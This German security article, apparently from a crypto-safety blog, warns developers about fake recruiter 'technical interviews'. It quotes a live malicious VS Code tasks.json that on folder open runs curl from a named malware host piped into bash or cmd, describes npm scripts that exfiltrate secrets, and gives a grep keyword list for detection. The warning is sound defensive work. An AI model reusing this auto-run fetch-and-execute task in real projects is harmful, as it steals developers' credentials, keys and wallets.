Das 'Ansteckende Interview': Wie falsche Recruiter Entwickler hacken
Zusammenfassung: Eine neue Welle staatlich unterstützter Angriffe zielt auf Senior-Entwickler im Krypto-Bereich. Betrüger geben sich als Recruiter und CTOs aus, um Kandidaten dazu zu bringen, bösartigen Code zu öffnen. Dieser Artikel analysiert den Fall 'Martin Erazo', den VS Code 'tasks.json'-Exploit und das 'Burn Protocol', das du zum Überleben brauchst.
Haftungsausschluss: Dieser Artikel berichtet über einen spezifischen Cybersicherheitsvorfall, bei dem die Identität echter Personen missbraucht wurde. Die Namen „Martin Erazo“ und „Ara Vartanian“ beziehen sich auf die Personas oder Identitäten, die von den Angreifern verwendet wurden. Wir glauben, dass die echten Personen mit diesen Namen unschuldige Opfer von Identitätsdiebstahl sind und nicht an diesen böswilligen Aktivitäten beteiligt waren.
1. Der perfekte Köder: Das „Martin Erazo“-Profil
Es beginnt mit einer Nachricht, die alle Schmerzpunkte eines Senior Engineers trifft:
- Rolle: CTO / Lead Architect.
- Budget: 6 Mio. $ Finanzierung gesichert.
- Tech: Web3, KI, Dezentrale Infrastruktur.
In einem kürzlich verifizierten Angriff nahm ein Recruiter, der sich als „Martin Erazo“ ausgab, über LinkedIn Kontakt auf. Das Profil nutzte Namen und Foto eines echten Theaterregisseurs, aber der Werdegang war gefälscht, um einen plötzlichen Wechsel zum „IT-Projektmanagement“ im Jahr 2025 zu zeigen – ein klassisches Zeichen für einen gehackten oder gekauften Account.
Der Betrug dreht sich schnell. Sie überspringen das Standard-HR-Screening und gehen direkt zu einem „technischen Interview“ mit dem oberen Management über – in diesem Fall gaben sie sich als der echte Branchen-CTO Ara Vartanian aus (derzeit bei Limit Break).
Rote Flagge: Der Projektname ändert sich ständig. Der Recruiter verkauft „Betfin“ (eine GameFi-Plattform), aber das bereitgestellte Pitch Deck ist für „SpaceXView“ (ein Metaverse-Projekt). Diese Inkonsistenz ist das Markenzeichen von Betrügern, die Assets aus verschiedenen Kampagnen recyceln.
2. Die Falle: „Check unseren MVP-Code“
Der falsche „CTO“ behauptet, er brauche deinen Expertenblick auf ihren MVP-Code. Sie senden einen Link zu einem GitHub-Repo oder eine ZIP-Datei. Sie drängen dich, es während des Interviews oder sofort danach zu öffnen.
Hier passiert der Angriff.
Sie nutzen deine Freundlichkeit und dein Ego aus. Du denkst, du bist da, um Bugs in ihren React-Komponenten zu finden. In Wirklichkeit sind die Bugs Features, die darauf ausgelegt sind, deine Ersparnisse zu leeren.
3. Der technische Exploit: Zero-Click Malware
Angreifer nutzen „Zero-Click“- oder „Low-Click“-Schwachstellen, die auf Entwicklertools abzielen. Sie brauchen nicht, dass du die App ausführst. Sie brauchen nur, dass du den Ordner öffnest.
Der Beweis (The Smoking Gun): .vscode/tasks.json
In diesem speziellen Fall enthielt das Repo eine waffenfähige .vscode/tasks.json-Datei. Diese Datei sagt VS Code, wie das Projekt gebaut werden soll.
Der bösartige Code:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- „runOn“: „folderOpen“: Das ist der Kill-Switch. In dem Moment, in dem du den Ordner in VS Code öffnest, wird dieser Task automatisch ausgeführt.
- Die Payload: Nutzt curl, um ein Skript von
vscodesettingtask.vercel.appherunterzuladen. Dies ist ein bekannter Malware-Host, der als Einstellungs-API getarnt ist. - Das Ergebnis: Das Skript läuft im Speicher und stiehlt sofort deine Chrome-Passwörter, Session-Cookies und SSH-Schlüssel.
Plan B: package.json Skripte
Wenn der VS-Code-Exploit fehlschlägt, manipulieren sie die npm-Skripte:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Das Ausführen von npm install oder npm start löst server/server.js aus, ein lokales Command-and-Control (C2) Skript, das deine Umgebungsvariablen (AWS-Keys, Wallet-Seeds) an den Angreifer exfiltriert.
4. Rote Flaggen vs. Grüne Flaggen
Wie erkennst du das, bevor es zu spät ist?
Wenn du Entwickler bist, sei misstrauisch gegenüber „privaten Repos“ und ZIP-Dateien. Legitime Firmen nutzen öffentliche Repos oder Standard-Take-Home-Tests.
Warnung: Dies ist nicht der einzige Weg, wie Entwickler angegriffen werden. Lies über die Kollaborateur-Falle auf Discord und wie Supply-Chain-Angriffe deine Abhängigkeiten kompromittieren.
| 🚩 Rote Flagge (Lauf weg) | ✅ Grüne Flagge (Sicher) |
|---|---|
| Code First: Sendet Code vor irgendeinem Angebot. | Standard-Prozess: Erst Interview, dann Code. |
| Identitäts-Bruch: Recruiter hat keine relevante Geschichte (z. B. Künstler wird IT-Manager). | Verifizierte Geschichte: Konsistente LinkedIn-Karriere. |
| Inkonsistenz: Projektnamen passen nicht (Betfin vs. SpaceXView). | Konsistenz: Name, Doku und Website stimmen überein. |
| Dringlichkeit: „CTO wartet“, „Öffne es jetzt“. | Geduld: Respektiert deine Zeit und deinen Zeitplan. |
| Persönliche E-Mail: [email protected] oder falsche Domain. | Firmen-E-Mail: [email protected] (mit aktiven MX-Einträgen). |
5. Sicherheitsprotokolle: Wie man sicher interviewt
Wenn du ein Senior-Entwickler bist, wirst du ins Visier genommen. Das Härten deiner Umgebung ist Pflicht.
Protokoll 1: "Wegwerf"-Umgebungen (Burner)
Nutze NIEMALS deine Haupt-Workstation für Code-Tests.
- Virtuelle Maschinen: Nutze VirtualBox oder VMWare.
- Cloud IDE: Nutze GitHub Codespaces oder Gitpod. Diese sind flüchtig und isoliert von deinen lokalen Wallet-Dateien.
Protokoll 2: Forensisches Audit
Bevor du irgendeinen unbekannten Code öffnest:
- Prüfe .vscode/tasks.json: Suche nach
runOn: folderOpen. - Prüfe package.json: Suche nach verdächtigen preinstall- oder postinstall-Skripten.
- Stichwortsuche: Grep nach
curl,wget,os.homedir(),.sshoderwallet.
Protokoll 3: VS Code Härten
Deaktiviere „Workspace Trust“ global.
- Einstellungen -> Sicherheit -> Workspace -> Trust: Startup Prompt -> Always.
- Dies zwingt VS Code, um Erlaubnis zu fragen, bevor irgendein Task auf Ordner-Ebene ausgeführt wird.
6. Gegenmaßnahme: Das „Burn Protocol“
Wenn du ein bösartiges Repo geöffnet hast (wie das vom „Martin Erazo“-Persona gesendete), gehe davon aus, dass du kompromittiert bist. Systemwiederherstellung ist nicht genug.
- Trennen: Zieh sofort das Ethernet-Kabel.
- Wallets verbrennen: Deine privaten Schlüssel sind weg. Erstelle eine neue Wallet auf einem sauberen Gerät (Handy) und transferiere verbleibende Gelder. Nutze niemals den alten Seed wieder.
- Sitzungen töten: Logge dich auf allen Geräten bei Google, GitHub und AWS aus. Widerrufe alle aktiven Sitzungen.
- SSH-Keys auditieren: Prüfe deine GitHub/GitLab-Einstellungen. Angreifer fügen oft ihren SSH-Key hinzu, um Hintertür-Zugang zu behalten. Lösche jeden Key, den du nicht erkennst.
- Plattmachen (Nuke It): Wische das Laufwerk und installiere das Betriebssystem neu. Das ist der einzige Weg, um 100 % sicher zu sein, dass das Rootkit weg ist.
Fazit
Der „Ansteckende Interview“-Betrug wendet deine Expertise gegen dich. Er zielt auf deine Bereitschaft, Probleme zu lösen. Aber im Web3 ist Paranoia eine berufliche Tugend. Verifiziere jede Identität, isoliere jedes Repo in einer Sandbox und vertraue niemals einem „Recruiter“, der dich drängt zu coden.
Verwandte Artikel
Der Langzeit-Betrug (Pig Butchering): Wie sie dein Herz und deine Wallet stehlen
Es beginnt mit einer 'Falsche Nummer'-SMS. Es endet mit dem Verlust deiner Rente. Eine Anatomie des psychologischen Drehbuchs des 'Pig Butchering'-Betrugs.
Trade nicht dort, wo du spielst: Ein Plädoyer für ein dediziertes Krypto-Gerät
Dein Gaming-PC steckt voller Sicherheitslücken. Dein Handy ist voller Tracker. Warum 200 $ für ein dediziertes 'Banking-Gerät' die beste Versicherung ist, die du kaufen kannst.
Die versteckte Hintertür: Warum du Berechtigungen widerrufen musst
Du hast deine Wallet getrennt, aber der Hacker kann sie immer noch leeren. Verstehe, wie 'Unbegrenzte Genehmigungen' funktionieren und wie du deine digitale Hintertür verriegelst.